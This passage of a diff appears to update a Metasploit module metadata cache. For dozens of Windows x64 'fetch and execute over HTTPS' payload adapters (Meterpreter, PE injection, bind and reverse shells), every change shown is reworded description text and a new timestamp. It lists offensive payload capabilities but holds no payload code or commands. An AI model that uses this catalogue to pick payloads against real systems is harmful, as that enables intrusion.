"description": "Fetch and Execute an x64 payload from an https server.\n\nExecute an arbitrary command (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nExecute an arbitrary command (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -204077,7 +204438,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/exec",
|
||||
@@ -204107,7 +204468,7 @@
|
||||
"scriptjunkie",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nLoad an arbitrary x64 library path",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nLoad an arbitrary x64 library path",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -204117,7 +204478,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/loadlibrary",
|
||||
@@ -204146,7 +204507,7 @@
|
||||
"Brendan Watters",
|
||||
"pasta <jaguinaga@infobytesec.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a dialog via MessageBox using a customizable title, text & icon",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a dialog via MessageBox using a customizable title, text & icon",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -204156,7 +204517,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/messagebox",
|
||||
@@ -204187,7 +204548,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204198,7 +204559,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/bind_ipv6_tcp",
|
||||
@@ -204231,7 +204592,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204242,7 +204603,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/bind_ipv6_tcp_uuid",
|
||||
@@ -204276,7 +204637,7 @@
|
||||
"OJ Reeves",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204287,7 +204648,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/bind_named_pipe",
|
||||
@@ -204320,7 +204681,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204331,7 +204692,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp",
|
||||
@@ -204368,7 +204729,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204379,7 +204740,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp_rc4",
|
||||
@@ -204412,7 +204773,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204423,7 +204784,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp_uuid",
|
||||
@@ -204456,7 +204817,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204467,7 +204828,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/reverse_http",
|
||||
@@ -204503,7 +204864,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204514,7 +204875,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/reverse_https",
|
||||
@@ -204547,7 +204908,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204558,7 +204919,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/reverse_named_pipe",
|
||||
@@ -204591,7 +204952,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204602,7 +204963,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp",
|
||||
@@ -204639,7 +205000,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204650,7 +205011,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp_rc4",
|
||||
@@ -204683,7 +205044,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204694,7 +205055,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp_uuid",
|
||||
@@ -204727,7 +205088,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204738,7 +205099,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/reverse_winhttp",
|
||||
@@ -204771,7 +205132,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204782,7 +205143,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/reverse_winhttps",
|
||||
@@ -204815,7 +205176,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204826,7 +205187,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter_bind_named_pipe",
|
||||
@@ -204856,7 +205217,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204867,7 +205228,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter_bind_tcp",
|
||||
@@ -204897,7 +205258,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204908,7 +205269,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter_reverse_http",
|
||||
@@ -204938,7 +205299,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204949,7 +205310,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter_reverse_https",
|
||||
@@ -204979,7 +205340,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204990,7 +205351,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter_reverse_ipv6_tcp",
|
||||
@@ -205020,7 +205381,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -205031,7 +205392,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter_reverse_tcp",
|
||||
@@ -205061,7 +205422,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205071,7 +205432,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/bind_ipv6_tcp",
|
||||
@@ -205104,7 +205465,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205114,7 +205475,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/bind_ipv6_tcp_uuid",
|
||||
@@ -205146,7 +205507,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205156,7 +205517,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/bind_named_pipe",
|
||||
@@ -205188,7 +205549,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205198,7 +205559,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/bind_tcp",
|
||||
@@ -205235,7 +205596,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205245,7 +205606,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/bind_tcp_rc4",
|
||||
@@ -205278,7 +205639,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205288,7 +205649,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/bind_tcp_uuid",
|
||||
@@ -205320,7 +205681,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205330,7 +205691,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/reverse_named_pipe",
|
||||
@@ -205362,7 +205723,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205372,7 +205733,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/reverse_tcp",
|
||||
@@ -205409,7 +205770,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205419,7 +205780,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/reverse_tcp_rc4",
|
||||
@@ -205452,7 +205813,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
